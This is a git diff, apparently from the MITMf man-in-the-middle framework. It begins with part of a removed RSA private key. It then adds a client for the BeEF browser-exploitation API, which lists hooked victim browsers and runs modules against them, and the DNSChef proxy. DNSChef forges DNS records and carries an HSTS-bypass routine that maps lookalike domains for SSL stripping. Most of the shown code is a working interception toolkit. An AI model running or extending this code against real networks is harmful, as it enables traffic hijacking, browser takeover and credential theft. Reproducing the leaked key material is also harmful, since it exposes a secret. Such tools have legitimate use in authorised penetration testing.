-+IJ6ystDpbD4fvFNdQyxH2SL9syFRyWyxY3vWB0C/OHWxGFtiTtmeivBSmpxl0RY
-RQqPLxX+xUCie7U6ud3e37FO7cKt+YT8lWKhGHKJlTlJbHs1d8crzp6qKJLl+ibB
-0fB6D6E5M1fnIJFJULIYAG5bEak90KuKOKCLoKLG+rq0vUvJsb9vNCAA6rh1ra+n
-8woY8TECgYEA7CEE/3oWnziB3PZoIIJDgbBalCCbA+/SgDiSvYJELEApCMj8HYc5
-UGOxrfVhPmbHRUI982Fj1oM3QBEX0zpkOk7Xk224RXwBHG8MMPQmTMVp+o06AI6D
-Nggyam9v5KLNMj5KghKJSOD0tR5YxsZPXw4gAI+wpqu3bXGKZ8bRpvUCgYEA1ICJ
-H+kw6H8edJHGdNH+X6RR0DIbS11XQvbKQ3vh6LdHTofoHqQa3t0zGYCgksKJbtHV
-2h3pv+nuOu5FEP2rrGJIforv2zwfJ5vp65jePrSXU+Up4pMHbP1Rm91ApcKNA15U
-q3SaclqTjmiqvaeSKc4TDjdb/rUaIhyIgbg97dUCgYAcdq5/jVwEvW8KD7nlkU5J
-59RDXtrQ0qvxQOCPb5CANQu9P10EwjQqeJoGejnKp+EFfEKzf93lEdQrKORSVguW
-68IYx3UbCyOnJcu2avfi8TkhNrzzLDqs3LgXFG/Mg8NwdwnMPCfIXTWiT5IsA+O1
-daJt7uRAcxqdWr5wXAsRsQKBgFXU4Q4hm16dUcjVxKoU08D/1wfX5UxolEF4+zOM
-yy+7L7MZk/kkYbIY+HXZjYIZz3cSjGVAZdTdgRsOeJknTPsg65UpOz57Jz5RbId7
-xHDhcqoxSty4dGxiWV8yW9VYIqr0pBBo1aVQzn7b6fMWxyPZl7rLQ3462iZjDgQP
-TfxNAoGBAK/Gef6MgchbFPikOVEX9qB/wt4sS3V7mT6QkqMZZgSkegDLBFVRJX3w
-Emx/V2A14p0uHPzn5irURyJ6daZCN4amPAWYQnkiXG8saiBwtfs23A1q7kxnPR+b
-KJfb+nDlhU1iYa/7nf4PaR/i9l6gcwOeh1ThK1nq4VvwTaTZKSRh
------END RSA PRIVATE KEY-----
diff --git a/core/beefapi b/core/beefapi
deleted file mode 160000
index 28d2fef..0000000
--- a/core/beefapi
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 28d2fef986e217425cb621701f267e40425330c4
diff --git a/core/beefapi.py b/core/beefapi.py
new file mode 100644
index 0000000..e8d2ec3
--- /dev/null
+++ b/core/beefapi.py
@@ -0,0 +1,171 @@
+#!/usr/bin/env python
+import requests
+import json
+import logging
+from random import sample
+from string import lowercase, digits
+
+logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
+
+class BeefAPI:
+
+ def __init__(self, opts=[]):
+ self.host = "127.0.0.1" or opts.get(host)
+ self.port = "3000" or opts.get(port)
+ self.token = None
+ self.url = "http://%s:%s/api/" % (self.host, self.port)
+ self.login_url = self.url + "admin/login"
+ self.hookurl = self.url + "hooks?token="
+ self.mod_url = self.url + "modules?token="
+ self.log_url = self.url + "logs?token="
+
+ def random_url(self):
+ return "".join(sample(digits + lowercase, 8))
+
+ def login(self, username, password):
+ try:
+ auth = json.dumps({"username": username, "password": password})
+ r = requests.post(self.login_url, data=auth)
+ data = r.json()
+
+ if (r.status_code == 200) and (data["success"]):
+ self.token = data["token"] #Auth token
+ return True
+ elif r.status_code != 200:
+ return False
+
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
+
+ def sessions_online(self):
+ return self.get_sessions("online", "session")
+
+ def sessions_offline(self):
+ return self.get_sessions("offline", "session")
+
+ def session2host(self, session):
+ return self.conversion(session, "ip")
+
+ def session2id(self, session):
+ return self.conversion(session, "id")
+
+ def hook_info(self, hook): #Returns parsed information on a session
+ session = self.conversion(hook, "session")
+ url = self.hookurl + self.token
+ r = requests.get(url).json()
+
+ try:
+ states = ["online", "offline"]
+ for state in states:
+ for v in r["hooked-browsers"][state].items():
+ if v[1]["session"] == session:
+ return v[1]
+ except IndexError:
+ pass
+
+ def hook_info_all(self, hook):
+ session = self.conversion(hook, "session")
+ url = self.url + "hooks/%s?token=%s" % (session, self.token)
+ return requests.get(url).json()
+
+ def hook_logs(self, hook):
+ session = self.conversion(hook, "session")
+ url = self.url + "logs/%s?token=%s" % (session, self.token)
+ return requests.get(url).json()
+
+ def hosts_online(self):
+ return self.get_sessions("online", "ip")
+
+ def hosts_offline(self):
+ return self.get_sessions("offline", "ip")
+
+ def host2session(self, host):
+ return self.conversion(host, "session")
+
+ def host2id(self, host):
+ return self.conversion(host, "id")
+
+ def ids_online(self):
+ return self.get_sessions("online", "id")
+
+ def ids_offline(self):
+ return self.get_sessions("offline", "id")
+
+ def id2session(self, id):
+ return self.conversion(id, "session")
+
+ def id2host(self, id):
+ return self.conversion(id, "ip")
+
+ def module_id(self, name): #Returns module id
+ url = self.mod_url + self.token
+ try:
+ r = requests.get(url).json()
+ for v in r.values():
+ if v["name"] == name:
+ return v["id"]
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
+
+ def module_name(self, id): #Returns module name
+ url = self.mod_url + self.token
+ try:
+ r = requests.get(url).json()
+ for v in r.values():
+ if v["id"] == id:
+ return v["name"]
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
+
+ def module_run(self, hook, mod_id, options={}): #Executes a module on a specified session
+ try:
+ session = self.conversion(hook, "session")
+ headers = {"Content-Type": "application/json", "charset": "UTF-8"}
+ payload = json.dumps(options)
+ url = self.url + "modules/%s/%s?token=%s" % (session, mod_id, self.token)
+ return requests.post(url, headers=headers, data=payload).json()
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
+
+ def module_results(self, hook, mod_id, cmd_id):
+ session = self.conversion(hook, "session")
+ url = self.mod_url + "%s/%s/%s?token=%s" % (session, mod_id, cmd_id, self.token)
+ return requests.get(url).json()
+
+ def modules_list(self):
+ return requests.get(self.mod_url + self.token).json()
+
+ def module_info(self, id):
+ url = self.url + "modules/%s?token=%s" % (id, self.token)
+ return requests.get(url).json()
+
+ def logs(self):
+ return requests.get(self.log_url + self.token).json()
+
+ def conversion(self, value, return_value): #Helper function for all conversion functions
+ url = self.hookurl + self.token
+ try:
+ r = requests.get(url).json()
+ states = ["online", "offline"]
+ for state in states:
+ for v in r["hooked-browsers"][state].items():
+ for r in v[1].values():
+ if str(value) == str(r):
+ return v[1][return_value]
+
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
+
+ except IndexError:
+ pass
+
+ def get_sessions(self, state, value): #Helper function
+ try:
+ hooks = []
+ r = requests.get(self.hookurl + self.token).json()
+ for v in r["hooked-browsers"][state].items():
+ hooks.append(v[1][value])
+
+ return hooks
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
diff --git a/core/configwatcher.py b/core/configwatcher.py
new file mode 100644
index 0000000..2da6962
--- /dev/null
+++ b/core/configwatcher.py
@@ -0,0 +1,46 @@
+#! /usr/bin/env python2.7
+
+import logging
+from watchdog.observers import Observer
+from watchdog.events import FileSystemEventHandler
+from configobj import ConfigObj
+
+logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ConfigWatcher(FileSystemEventHandler):
+
+ _instance = None
+ config = ConfigObj("./config/mitmf.conf")
+
+ @staticmethod
+ def getInstance():
+ if ConfigWatcher._instance is None:
+ ConfigWatcher._instance = ConfigWatcher()
+
+ return ConfigWatcher._instance
+
+ def startConfigWatch(self):
+ observer = Observer()
+ observer.schedule(self, path='./config', recursive=False)
+ observer.start()
+
+ def getConfig(self):
+ return self.config
+
+ def on_modified(self, event):
+ mitmf_logger.debug("[{}] Detected configuration changes, reloading!".format(self.__class__.__name__))
+ self.reloadConfig()
+ self.onConfigChange()
+
+ def onConfigChange(self):
+ """ We can subclass this function to do stuff after the config file has been modified"""
+ pass
+
+ def reloadConfig(self):
+ try:
+ self.config = ConfigObj("./config/mitmf.conf")
+ except Exception as e:
+ mitmf_logger.error("Error reloading config file: {}".format(e))
+ pass
diff --git a/core/dnschef/CHANGELOG b/core/dnschef/CHANGELOG
new file mode 100644
index 0000000..727a7d7
--- /dev/null
+++ b/core/dnschef/CHANGELOG
@@ -0,0 +1,29 @@
+Version 0.3
+
+* Added support for the latest version of the dnslib library - 0.9.3
+* Added support for logging. (idea by kafeine)
+* Added support for SRV, DNSKEY, and RRSIG records. (idea by mubix)
+* Added support for TCP remote nameserver connections. (idea by mubix)
+* DNS name matching is now case insensitive.
+* Various small bug fixes and performance tweaks.
+* Python libraries are no longer bundled with the distribution, but
+ compiled in the Windows binary.
+
+Version 0.2.1
+
+* Fixed a Python 2.6 compatibility issue. (thanks Mehran Goudarzi)
+
+Version 0.2
+
+* Added IPv6 support.
+* Added AAAA, MX, CNAME, NS, SOA and NAPTR support.
+* Added support for ANY queries (returns all known fake records).
+* Changed file format to support more DNS record types.
+* Added alternative DNS port support (contributed by fnv).
+* Added alternative listening port support for the server (contributed by Mark Straver).
+* Updated bundled dnslib library to the latest version - 0.8.2.
+* Included IPy library for IPv6 support.
+
+Version 0.1
+
+* First public release
diff --git a/core/dnschef/DNSchef.py b/core/dnschef/DNSchef.py
new file mode 100755
index 0000000..69f3681
--- /dev/null
+++ b/core/dnschef/DNSchef.py
@@ -0,0 +1,508 @@
+#!/usr/bin/env python2.7
+#
+# DNSChef is a highly configurable DNS Proxy for Penetration Testers
+# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/
+# for the latest version and documentation. Please forward all issues and
+# concerns to iphelix [at] thesprawl.org.
+
+# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# 1. Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+# 2. Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+# 3. Neither the name of the copyright holder nor the names of its contributors
+# may be used to endorse or promote products derived from this software without
+# specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+import threading, random, operator, time
+import SocketServer, socket, sys, os
+import binascii
+import string
+import base64
+import time
+import logging
+
+from configobj import ConfigObj
+from core.configwatcher import ConfigWatcher
+from core.utils import shutdown
+
+from dnslib import *
+from IPy import IP
+
+formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+dnschef_logger = logging.getLogger('dnschef')
+fileHandler = logging.FileHandler("./logs/dnschef/dnschef.log")
+fileHandler.setFormatter(formatter)
+dnschef_logger.addHandler(fileHandler)
+
+# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
+# calculate an appropriate response based on user parameters.
+class DNSHandler():
+
+ def parse(self,data):
+
+ nametodns = DNSChef.getInstance().nametodns
+ nameservers = DNSChef.getInstance().nameservers
+ hsts = DNSChef.getInstance().hsts
+ hstsconfig = DNSChef.getInstance().real_records
+ server_address = DNSChef.getInstance().server_address
+
+ response = ""
+
+ try:
+ # Parse data as DNS
+ d = DNSRecord.parse(data)
+
+ except Exception, e:
+ dnschef_logger.info("{} [DNSChef] Error: invalid DNS request".format(self.client_address[0]))
+
+ else:
+ # Only Process DNS Queries
+ if QR[d.header.qr] == "QUERY":
+
+ # Gather query parameters
+ # NOTE: Do not lowercase qname here, because we want to see
+ # any case request weirdness in the logs.
+ qname = str(d.q.qname)
+
+ # Chop off the last period
+ if qname[-1] == '.': qname = qname[:-1]
+
+ qtype = QTYPE[d.q.qtype]
+
+ # Find all matching fake DNS records for the query name or get False
+ fake_records = dict()
+
+ for record in nametodns:
+
+ fake_records[record] = self.findnametodns(qname, nametodns[record])
+
+ if hsts:
+ if qname in hstsconfig:
+ response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d)
+ return response
+
+ elif qname[:4] == 'wwww':
+ response = self.hstsbypass(qname[1:], qname, nameservers, d)
+ return response
+
+ elif qname[:3] == 'web':
+ response = self.hstsbypass(qname[3:], qname, nameservers, d)
+ return response
+
+ # Check if there is a fake record for the current request qtype
+ if qtype in fake_records and fake_records[qtype]:
+
+ fake_record = fake_records[qtype]
+
+ # Create a custom response to the query
+ response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
+
+ dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))
+
+ # IPv6 needs additional work before inclusion:
+ if qtype == "AAAA":
+ ipv6 = IP(fake_record)
+ ipv6_bin = ipv6.strBin()
+ ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple)))
+
+ elif qtype == "SOA":
+ mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
+ times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
+
+ # dnslib doesn't like trailing dots
+ if mname[-1] == ".": mname = mname[:-1]
+ if rname[-1] == ".": rname = rname[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
+
+ elif qtype == "NAPTR":
+ order,preference,flags,service,regexp,replacement = fake_record.split(" ")
+ order = int(order)
+ preference = int(preference)
+
+ # dnslib doesn't like trailing dots
+ if replacement[-1] == ".": replacement = replacement[:-1]
+
+ response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) )
+
+ elif qtype == "SRV":
+ priority, weight, port, target = fake_record.split(" ")
+ priority = int(priority)
+ weight = int(weight)
+ port = int(port)
+ if target[-1] == ".": target = target[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
+
+ elif qtype == "DNSKEY":
+ flags, protocol, algorithm, key = fake_record.split(" ")
+ flags = int(flags)
+ protocol = int(protocol)
+ algorithm = int(algorithm)
+ key = base64.b64decode(("".join(key)).encode('ascii'))
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
+
+ elif qtype == "RRSIG":
+ covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
+ covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
+ algorithm = int(algorithm)
+ labels = int(labels)
+ orig_ttl = int(orig_ttl)
+ sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
+ sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
+ key_tag = int(key_tag)
+ if name[-1] == '.': name = name[:-1]
+ sig = base64.b64decode(("".join(sig)).encode('ascii'))
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig)))
+
+ else:
+ # dnslib doesn't like trailing dots
+ if fake_record[-1] == ".": fake_record = fake_record[:-1]
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
+
+ response = response.pack()
+
+ elif qtype == "*" and not None in fake_records.values():
+ dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))
+
+ response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
+
+ for qtype,fake_record in fake_records.items():
+ if fake_record:
+
+ # NOTE: RDMAP is a dictionary map of qtype strings to handling classses
+ # IPv6 needs additional work before inclusion:
+ if qtype == "AAAA":
+ ipv6 = IP(fake_record)
+ ipv6_bin = ipv6.strBin()
+ fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
+
+ elif qtype == "SOA":
+ mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
+ times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
+
+ # dnslib doesn't like trailing dots
+ if mname[-1] == ".": mname = mname[:-1]
+ if rname[-1] == ".": rname = rname[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
+
+ elif qtype == "NAPTR":
+ order,preference,flags,service,regexp,replacement = fake_record.split(" ")
+ order = int(order)
+ preference = int(preference)
+
+ # dnslib doesn't like trailing dots
+ if replacement and replacement[-1] == ".": replacement = replacement[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement)))
+
+ elif qtype == "SRV":
+ priority, weight, port, target = fake_record.split(" ")
+ priority = int(priority)
+ weight = int(weight)
+ port = int(port)
+ if target[-1] == ".": target = target[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
+
+ elif qtype == "DNSKEY":
+ flags, protocol, algorithm, key = fake_record.split(" ")
+ flags = int(flags)
+ protocol = int(protocol)
+ algorithm = int(algorithm)
+ key = base64.b64decode(("".join(key)).encode('ascii'))
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
+
+ elif qtype == "RRSIG":
+ covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
+ covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
+ algorithm = int(algorithm)
+ labels = int(labels)
+ orig_ttl = int(orig_ttl)
+ sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
+ sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
+ key_tag = int(key_tag)
+ if name[-1] == '.': name = name[:-1]
+ sig = base64.b64decode(("".join(sig)).encode('ascii'))
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) ))
+
+ else:
+ # dnslib doesn't like trailing dots
+ if fake_record[-1] == ".": fake_record = fake_record[:-1]
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
+
+ response = response.pack()
+
+ # Proxy the request
+ else:
+ dnschef_logger.debug("{} [DNSChef] Proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))
+
+ nameserver_tuple = random.choice(nameservers).split('#')
+ response = self.proxyrequest(data, *nameserver_tuple)
+
+ return response
+
+
+ # Find appropriate ip address to use for a queried name. The function can
+ def findnametodns(self,qname,nametodns):
+
+ # Make qname case insensitive
+ qname = qname.lower()
+
+ # Split and reverse qname into components for matching.
+ qnamelist = qname.split('.')
+ qnamelist.reverse()
+
+ # HACK: It is important to search the nametodns dictionary before iterating it so that
+ # global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that.
+ for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)):
+
+ # NOTE: It is assumed that domain name was already lowercased
+ # when it was loaded through --file, --fakedomains or --truedomains
+ # don't want to waste time lowercasing domains on every request.
+
+ # Split and reverse domain into components for matching
+ domain = domain.split('.')
+ domain.reverse()
+
+ # Compare domains in reverse.
+ for a,b in map(None,qnamelist,domain):
+ if a != b and b != "*":
+ break
+ else:
+ # Could be a real IP or False if we are doing reverse matching with 'truedomains'
+ return host
+ else:
+ return False
+
+ # Obtain a response from a real DNS server.
+ def proxyrequest(self, request, host, port="53", protocol="udp"):
+ reply = None
+ try:
+ if DNSChef.getInstance().ipv6:
+
+ if protocol == "udp":
+ sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
+ elif protocol == "tcp":
+ sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
+
+ else:
+ if protocol == "udp":
+ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ elif protocol == "tcp":
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+ sock.settimeout(3.0)
+
+ # Send the proxy request to a randomly chosen DNS server
+
+ if protocol == "udp":
+ sock.sendto(request, (host, int(port)))
+ reply = sock.recv(1024)
+ sock.close()
+
+ elif protocol == "tcp":
+ sock.connect((host, int(port)))
+
+ # Add length for the TCP request
+ length = binascii.unhexlify("%04x" % len(request))
+ sock.sendall(length+request)
+
+ # Strip length from the response
+ reply = sock.recv(1024)
+ reply = reply[2:]
+
+ sock.close()
+
+ except Exception, e:
+ dnschef_logger.warning("[DNSChef] Could not proxy request: {}".format(e))
+ else:
+ return reply
+
+ def hstsbypass(self, real_domain, fake_domain, nameservers, d):
+
+ dnschef_logger.info("{} [DNSChef] Resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))
+
+ response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
+
+ nameserver_tuple = random.choice(nameservers).split('#')
+
+ #First proxy the request with the real domain
+ q = DNSRecord.question(real_domain).pack()
+ r = self.proxyrequest(q, *nameserver_tuple)
+
+ #Parse the answer
+ dns_rr = DNSRecord.parse(r).rr
+
+ #Create the DNS response
+ for res in dns_rr:
+ if res.get_rname() == real_domain:
+ res.set_rname(fake_domain)
+ response.add_answer(res)
+ else:
+ response.add_answer(res)
+
+ return response.pack()
+
+# UDP DNS Handler for incoming requests
+class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
+
+ def handle(self):
+ (data,socket) = self.request
+ response = self.parse(data)
+
+ if response:
+ socket.sendto(response, self.client_address)
+
+# TCP DNS Handler for incoming requests
+class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
+
+ def handle(self):
+ data = self.request.recv(1024)
+
+ # Remove the addition "length" parameter used in the
+ # TCP DNS protocol
+ data = data[2:]
+ response = self.parse(data)
+
+ if response:
+ # Calculate and add the additional "length" parameter
+ # used in TCP DNS protocol
+ length = binascii.unhexlify("%04x" % len(response))
+ self.request.sendall(length+response)
+
+class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
+
+ # Override SocketServer.UDPServer to add extra parameters
+ def __init__(self, server_address, RequestHandlerClass):
+ self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET
+
+ SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass)
+
+class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
+
+ # Override default value
+ allow_reuse_address = True
+
+ # Override SocketServer.TCPServer to add extra parameters
+ def __init__(self, server_address, RequestHandlerClass):
+ self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET
+
+ SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)
+
+class DNSChef(ConfigWatcher):
+
+ _instance = None
+ version = "0.4"
+
+ tcp = False
+ ipv6 = False
+ hsts = False
+ real_records = dict()
+ nametodns = dict()
+ server_address = "0.0.0.0"
+ nameservers = ["8.8.8.8"]
+ port = 53
+
+ @staticmethod
+ def getInstance():
+ if DNSChef._instance == None:
+ DNSChef._instance = DNSChef()
+
+ return DNSChef._instance
+
+ def onConfigChange(self):
+ config = self.config['MITMf']['DNS']
+
+ self.port = int(config['port'])
+
+ # Main storage of domain filters
+ # NOTE: RDMAP is a dictionary map of qtype strings to handling classe
+ for qtype in RDMAP.keys():
+ self.nametodns[qtype] = dict()
+
+ # Adjust defaults for IPv6
+ if config['ipv6'].lower() == 'on':
+ self.ipv6 = True
+ if config['nameservers'] == "8.8.8.8":
+ self.nameservers = "2001:4860:4860::8888"
+
+ # Use alternative DNS servers
+ if config['nameservers']:
+ self.nameservers = config['nameservers'].split(',')
+
+ for section in config.sections:
+
+ if section in self.nametodns:
+ for domain,record in config[section].iteritems():
+
+ # Make domain case insensitive
+ domain = domain.lower()
+
+ self.nametodns[section][domain] = record
+
+ for k,v in self.config["SSLstrip+"].iteritems():
+ self.real_records[v] = k
+
+ def setHstsBypass(self):
+ self.hsts = True
+
+ def start(self):
+ self.onConfigChange()
+ self.startConfigWatch()
+
+ try:
+ if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
+ self.startTCP()
+ else:
+ self.startUDP()
+ except socket.error as e:
+ if "Address already in use" in e:
+ shutdown("\n[DNSChef] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
+
+ # Initialize and start the DNS Server
+ def startUDP(self):
+ server = ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler)
+ # Start a thread with the server -- that thread will then start
+ # more threads for each request
+ server_thread = threading.Thread(target=server.serve_forever)
+
+ # Exit the server thread when the main thread terminates
+ server_thread.daemon = True
+ server_thread.start()
+
+ # Initialize and start the DNS Server
+ def startTCP(self):
+ server = ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler)
+
+ # Start a thread with the server -- that thread will then start
+ # more threads for each request
+ server_thread = threading.Thread(target=server.serve_forever)
+
+ # Exit the server thread when the main thread terminates
+ server_thread.daemon = True
+ server_thread.start()
diff --git a/core/dnschef/LICENSE b/core/dnschef/LICENSE
new file mode 100644
index 0000000..b826757
--- /dev/null
+++ b/core/dnschef/LICENSE
@@ -0,0 +1,25 @@
+Copyright (C) 2014 Peter Kacherginsky
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+3. Neither the name of the copyright holder nor the names of its contributors
+ may be used to endorse or promote products derived from this software without
+ specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/core/dnschef/README.md b/core/dnschef/README.md
new file mode 100644
index 0000000..589a274
--- /dev/null
+++ b/core/dnschef/README.md
@@ -0,0 +1,339 @@
+DNSChef
+=======
+
+The latest version of this document can be obtained from http://thesprawl.org/projects/dnschef/
+
+DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.
+
+There are several DNS Proxies out there. Most will simply point all DNS queries a single IP address or implement only rudimentary filtering. DNSChef was developed as part of a penetration test where there was a need for a more configurable system. As a result, DNSChef is cross-platform application capable of forging responses based on inclusive and exclusive domain lists, supporting multiple DNS record types, matching domains with wildcards, proxying true responses for nonmatching domains, defining external configuration files, IPv6 and many other features. You can find detailed explanation of each of the features and suggested uses below.
+
+The use of DNS Proxy is recommended in situations where it is not possible to force an application to use some other proxy server directly. For example, some mobile applications completely ignore OS HTTP Proxy settings. In these cases, the use of a DNS proxy server such as DNSChef will allow you to trick that application into forwarding connections to the desired destination.
+
+Setting up a DNS Proxy
+======================
+
+Before you can start using DNSChef, you must configure your machine to use a DNS nameserver with the tool running on it. You have several options based on the operating system you are going to use:
+
+* **Linux** - Edit */etc/resolv.conf* to include a line on the very top with your traffic analysis host (e.g add "nameserver 127.0.0.1" if you are running locally). Alternatively, you can add a DNS server address using tools such as Network Manager. Inside the Network Manager open IPv4 Settings, select *Automatic (DHCP) addresses only* or *Manual* from the *Method* drop down box and edit *DNS Servers* text box to include an IP address with DNSChef running.
+
